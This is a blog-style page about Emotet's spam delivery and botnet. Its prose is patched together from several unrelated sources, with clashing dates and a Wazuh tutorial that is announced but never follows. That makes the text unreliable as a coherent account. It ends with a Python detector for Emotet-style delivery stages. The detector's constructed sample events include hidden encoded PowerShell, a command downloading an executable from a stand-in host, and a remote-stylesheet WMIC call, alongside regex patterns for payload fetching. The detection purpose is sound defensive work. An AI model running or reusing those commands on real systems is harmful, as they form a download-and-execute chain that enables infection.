New Spam Template for Emotet Malware: The Latest Trick in the Malspam Campaigns
- conswexpodergauter
- Aug 17, 2023
- 3 min read
At the beginning of June 2019, Emotet's operators took an extended summer vacation, and even the command and control (C2) activity paused for the most part. As summer drew to a close, Talos and other researchers started to see increased activity in Emotet's C2 infrastructure, and as of Sept. 16, 2019, the Emotet botnet had fully reawakened and resumed spamming operations. While this reemergence may worry many users, Talos' existing Emotet coverage and protection remain the same. There is a slew of new IOCs to help protect users from this latest push, but past Snort coverage will still block this malware, as will traditional security best practices such as not opening suspicious email attachments and using strong passwords.
New Spam Template for Emotet Malware
In the process of analyzing Emotet, Cisco Talos has detonated hundreds of thousands of copies of the Emotet malware inside of our malware sandbox, Threat Grid. Over the past 10 months, Emotet has attempted to use Threat Grid infections as outbound spam emitters nearly 19,000 times.
Emotet operates as a botnet, with each infected device able to coordinate new malspam campaigns to continue the spread of the malware to more victims in different organizations. Kroll observed that as of April 22, 2022, the Emotet operators deployed a change to one of their most active botnet subgroups (tracked as Epoch4), affecting the delivery mechanism of the loader part of the malware.
Over the past several years, Emotet has established itself as a pervasive and continually evolving threat, morphing from a prominent banking trojan into a modular spam and malware-as-a-service botnet with global distribution. After emerging in June 2014 targeting German and Austrian customers, Emotet demonstrated new capabilities in 2015 as it expanded its scope to banking customers in Switzerland [1]. Since then it has acquired further capabilities, adding modules for credential stealing, network spreading, email harvesting and address book stealing, among others [2] [3] [4].
After a successful infection, the malware modifies system settings and uses the compromised computer to spread itself further. Cyber criminals usually distribute it through spam email campaigns.
Emotet also joins the infected computer to a botnet, which is then used to send the spam emails that distribute the malware. In addition, it hides within system folders and registers itself as a 'system service', modifying Windows Registry settings so that it runs automatically when the system starts.
The spam emails typically carry a malicious attachment (a link or a file) which, once opened, installs Emotet on the system. In some cases the attachment delivers other malware first (e.g., TrickBot), which in turn downloads and installs Emotet. At the time of writing, the spam campaigns used to spread Emotet are typically themed around finances (invoices, payments and the like).
Nonetheless, the tactic itself remains the same: the crooks send hundreds of thousands of spam emails carrying malicious attachments (Microsoft Office documents) designed to get malware onto the system.
Update July 29, 2020 - New tactics have been observed in the proliferation of the Emotet malware via email spam campaigns. This malicious software has been updated with an email attachment stealing module. Therefore, from infected systems Emotet can obtain genuine email attachments, which are then used to increase the legitimacy of scam mail spreading this malware.
Now Kaspersky Labs says a rapidly accelerating and complex spam email campaign is enticing marks with fraudulent messages designed to trick one into unpacking and installing Emotet or Qbot malware that can steal information, collect data on a compromised corporate network, and move laterally through the network and install ransomware or other trojans on networked devices.
Emotet is a prolific malware botnet that originally functioned as a banking trojan when it emerged in 2014. It was spread via spam campaigns, imitating financial statements, transfers, and payment invoices. Emotet is propagated mostly via Office email attachments containing a macro. If enabled, it downloads a malicious PE file (Emotet) which is then executed.
In this blog we will explain how to use Wazuh to detect the different stages of Emotet malware. Emotet is a malware originally designed as a trojan, and mainly used to steal sensitive and private information. It has the ability to spread to other connected computers and can even act as a gateway for other malware.
Astaroth is a fileless malware campaign that spammed users with links to a .LNK shortcut file. When users opened the file, the WMIC tool was launched, along with a number of other legitimate Windows tools. These tools downloaded additional code that was executed only in memory, leaving no file on disk for signature-based scanners to detect. The attacker then downloaded and ran a trojan that stole credentials and uploaded them to a remote server.
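The delivery chain described above (Office attachment, macro, script host fetching a PE, then persistence via a service or Run key) and the Astaroth-style living-off-the-land chain (LNK launching WMIC) both leave a trail in endpoint telemetry even when nothing useful is written to disk. The following is an added example, not Wazuh's rules and not code from Talos, Kroll or any other source quoted on this page. It assumes Sysmon-style event records with `EventID`, `Image`, `ParentImage`, `CommandLine` and `TargetObject` fields; the sample events are constructed, not captured, and the process names and registry paths in the rules are the author's assumptions about what such a chain typically looks like.

```python
"""Stage-based detection of an Emotet-style delivery chain over endpoint events.

Added example (not Wazuh's, Talos', Kroll's or Emotet's own code). Events are
modelled on Sysmon Event ID 1 (process create) and 13 (registry value set);
the field names are an assumption, and SAMPLE_EVENTS below is constructed.
"""
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# Command-line fragments that usually mean "fetch a payload".
DOWNLOAD_PATTERNS = re.compile(
    r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Net\.WebClient|"
    r"BitsTransfer|-enc(odedcommand)?\s", re.IGNORECASE)
# WMIC pulling a stylesheet from a URL: the LNK -> WMIC trick used by Astaroth.
WMIC_REMOTE_XSL = re.compile(r"/format:\S*https?:", re.IGNORECASE)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)
SERVICE_KEY = re.compile(r"\\Services\\[^\\]+\\ImagePath$", re.IGNORECASE)


def basename(path):
    """Lower-cased file name from a Windows (or mixed) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return (stage, reason) for one event, or None if it looks benign."""
    if event["EventID"] == 1:
        child = basename(event["Image"])
        parent = basename(event.get("ParentImage", ""))
        cmd = event.get("CommandLine", "")
        if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
            return ("macro_stage", f"{parent} spawned {child}")
        if child in SCRIPT_HOSTS and DOWNLOAD_PATTERNS.search(cmd):
            return ("download_stage", f"{child} command line fetches content")
        if child == "wmic.exe" and WMIC_REMOTE_XSL.search(cmd):
            return ("lolbin_stage", "wmic.exe loading a remote XSL stylesheet")
        if child == "sc.exe" and re.search(r"\bcreate\b", cmd, re.IGNORECASE):
            return ("persistence_stage", "sc.exe create registers a new service")
    elif event["EventID"] == 13:
        target = event.get("TargetObject", "")
        if RUN_KEY.search(target):
            return ("persistence_stage", f"Run key written: {target}")
        if SERVICE_KEY.search(target):
            return ("persistence_stage", f"service ImagePath written: {target}")
    return None


def detect_stages(events):
    """Map stage name -> list of reasons, in event order."""
    stages = {}
    for ev in events:
        hit = classify(ev)
        if hit:
            stages.setdefault(hit[0], []).append(hit[1])
    return stages


# Constructed sample telemetry for one host; not a real capture.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "WINWORD.EXE invoice.doc"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "cmd /c powershell -w hidden -enc SQBFAFgA..."},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell -w hidden (New-Object Net.WebClient)"
                    ".DownloadFile('http://example.invalid/x','C:/Users/Public/x.exe')"},
    {"EventID": 13, "Image": r"C:\Users\Public\x.exe",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\x"},
    {"EventID": 1, "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'wmic os get /format:"https://example.invalid/a.xsl"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe", "CommandLine": "svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for stage, reasons in detect_stages(SAMPLE_EVENTS).items():
        print(stage, "->", "; ".join(reasons))
```

The value of a staged view is that a single hit (a PowerShell download, say) is noisy on its own, but an Office parent spawning a script host, followed by a download and then a Run key write from the downloaded binary, on the same host within minutes, is the sequence the page describes and is worth an alert in its own right. Anyone porting this to a SIEM should add the host and time window to the grouping key.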
Its first version dates back to 2014. Back then it was primarily a banking trojan. These days Emotet is known mostly for its spamming capabilities and as a delivery mechanism for other malware strains.